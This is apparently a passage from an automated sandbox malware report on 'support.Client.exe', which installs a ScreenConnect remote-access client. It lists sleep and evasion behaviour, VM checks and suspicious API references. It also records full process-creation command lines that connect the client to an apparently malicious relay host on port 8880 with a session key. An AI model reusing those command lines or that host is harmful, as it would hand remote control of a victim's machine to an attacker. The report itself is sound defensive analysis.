                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..ient_4b14c015c87c1ad8_0018.0004_none_e9b66cfe0ceec305\ScreenConnect.Client.dllJump to dropped file
                Source: C:\Users\user\Desktop\support.Client.exe TID: 2220Thread sleep time: -40000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -599888s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -599776s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -599666s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -599540s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -599425s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -599314s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -599177s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -599049s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -598907s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -598538s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -597621s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -597510s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -597377s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -597240s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -597117s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -596942s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -596825s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -596714s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -596602s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -596491s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -596379s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -596268s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -596141s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -596026s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -595917s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -595805s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -595693s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -595581s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -595453s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -595322s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -595212s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -595103s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -594899s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -594758s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -594636s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -594503s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -594375s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -594264s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -594151s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -594039s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -593929s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -593817s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -593701s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -593587s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -593483s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -593367s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -593259s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -593147s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -593035s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -592908s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -592742s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4880Thread sleep time: -592633s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe TID: 6344Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exe TID: 6380Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exe TID: 6400Thread sleep count: 144 > 30
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exe TID: 6400Thread sleep count: 41 > 30
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exe TID: 6420Thread sleep count: 209 > 30
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe TID: 6544Thread sleep count: 84 > 30
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                Source: C:\Users\user\Desktop\support.Client.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\support.Client.exeThread delayed: delay time: 40000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599888Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599776Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599666Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599540Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599425Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599314Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599177Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599049Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598907Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598538Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597621Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597510Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597377Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597240Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597117Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596942Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596825Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596714Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596602Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596491Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596379Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596268Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596141Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596026Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595917Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595805Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595693Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595581Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595322Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595212Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595103Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594899Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594758Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594636Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594503Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594264Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594151Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594039Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593929Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593817Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593701Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593587Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593483Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593367Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593259Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593147Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593035Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592908Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592742Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592633Jump to behavior
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\
                Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                Source: ScreenConnect.ClientService.exe, 00000011.00000002.4159795619.0000000000D1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlleS2gMoW6pxHqHTQdkVPR3tWAED4PaXMyxSCsVfvS5x%2bD6HmCLs68MhV46R8MZKmo1TFlrWJa1YjjBBiNyTHb6vMp5bwAw6SBn7qSa3OLCFvKac77ooLhGXIKHPll7r9fHyHomHZ7Cy6UiZo%2fLH1m0xtJUlwQCrw8XCJdG%2ffBozmN8eL%2b%2bm0Fofhb08PSqX8fRwaZBpCsqRtXK2fd128aH7mu%2%hr
                Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                Source: dfsvc.exe, 00000002.00000002.3931701511.000001C1FC641000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: dfsvc.exe, 00000002.00000002.3937395741.000001C1FEFD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWf
                Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 5e b8 7f fe b2 05-05 05 26 a7 ed b4 36 80
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                Source: dfsvc.exe, 00000002.00000002.3935908647.000001C1FEE8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWchemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">
                Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\support.Client.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\support.Client.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\support.Client.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                .NET source code references suspicious native API functions
                Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 964 -ip 964Jump to behavior
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 800Jump to behavior
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pilwerui.rchelp.top&p=8880&s=577cfc54-82b0-4777-83f3-37207b6e5fc8&k=BgIAAACkAABSU0ExAAgAAAEAAQCFVe49RH8w3PHHeO1qVSBr4d2sU0V6TqcGbDS6EEXrvVeV3soat%2b%2be7pjtKgmoYVSxtAgqBJFx3x%2bu%2fgeS2gMoW6pxHqHTQdkVPR3tWAED4PaXMyxSCsVfvS5x%2bD6HmCLs68MhV46R8MZKmo1TFlrWJa1YjjBBiNyTHb6vMp5bwAw6SBn7qSa3OLCFvKac77ooLhGXIKHPll7r9fHyHomHZ7Cy6UiZo%2fLH1m0xtJUlwQCrw8XCJdG%2ffBozmN8eL%2b%2bm0Fofhb08PSqX8fRwaZBpCsqRtXK2fd128aH7mu%2be2Q2vOc7WrnUjiGs7o7fZ9oSw384B%2f9gNelOJnoEsAbyt&r=&i=Untitled%20Session" "1"
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\qxklwjq4.0t8\8lwk3lw6.vgo\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\screenconnect.clientservice.exe" "?e=support&y=guest&h=pilwerui.rchelp.top&p=8880&s=577cfc54-82b0-4777-83f3-37207b6e5fc8&k=bgiaaackaabsu0exaagaaaeaaqcfve49rh8w3phheo1qvsbr4d2su0v6tqcgbds6eexrvvev3soat%2b%2be7pjtkgmoyvsxtagqbjfx3x%2bu%2fges2gmow6pxhqhtqdkvpr3twaed4paxmyxscsvfvs5x%2bd6hmcls68mhv46r8mzkmo1tflrwja1yjjbbinythb6vmp5bwaw6sbn7qsa3olcfvkac77oolhgxikhpll7r9fhyhomhz7cy6uizo%2flh1m0xtjulwqcrw8xcjdg%2ffbozmn8el%2b%2bm0fofhb08psqx8frwazbpcsqrtxk2fd128ah7mu%2be2q2voc7wrnujigs7o7fz9osw384b%2f9gnelojnoesabyt&r=&i=untitled%20session" "1"
                Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\qxklwjq4.0t8\8lwk3lw6.vgo\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\screenconnect.clientservice.exe" "?e=support&y=guest&h=pilwerui.rchelp.top&p=8880&s=577cfc54-82b0-4777-83f3-37207b6e5fc8&k=bgiaaackaabsu0exaagaaaeaaqcfve49rh8w3phheo1qvsbr4d2su0v6tqcgbds6eexrvvev3soat%2b%2be7pjtkgmoyvsxtagqbjfx3x%2bu%2fges2gmow6pxhqhtqdkvpr3twaed4paxmyxscsvfvs5x%2bd6hmcls68mhv46r8mzkmo1tflrwja1yjjbbinythb6vmp5bwaw6sbn7qsa3olcfvkac77oolhgxikhpll7r9fhyhomhz7cy6uizo%2flh1m0xtjulwqcrw8xcjdg%2ffbozmn8el%2b%2bm0fofhb08psqx8frwazbpcsqrtxk2fd128ah7mu%2be2q2voc7wrnujigs7o7fz9osw384b%2f9gnelojnoesabyt&r=&i=untitled%20session" "1"
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\qxklwjq4.0t8\8lwk3lw6.vgo\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\screenconnect.clientservice.exe" "?e=support&y=guest&h=pilwerui.rchelp.top&p=8880&s=577cfc54-82b0-4777-83f3-37207b6e5fc8&k=bgiaaackaabsu0exaagaaaeaaqcfve49rh8w3phheo1qvsbr4d2su0v6tqcgbds6eexrvvev3soat%2b%2be7pjtkgmoyvsxtagqbjfx3x%2bu%2fges2gmow6pxhqhtqdkvpr3twaed4paxmyxscsvfvs5x%2bd6hmcls68mhv46r8mzkmo1tflrwja1yjjbbinythb6vmp5bwaw6sbn7qsa3olcfvkac77oolhgxikhpll7r9fhyhomhz7cy6uizo%2flh1m0xtjulwqcrw8xcjdg%2ffbozmn8el%2b%2bm0fofhb08psqx8frwazbpcsqrtxk2fd128ah7mu%2be2q2voc7wrnujigs7o7fz9osw384b%2f9gnelojnoesabyt&r=&i=untitled%20session" "1"
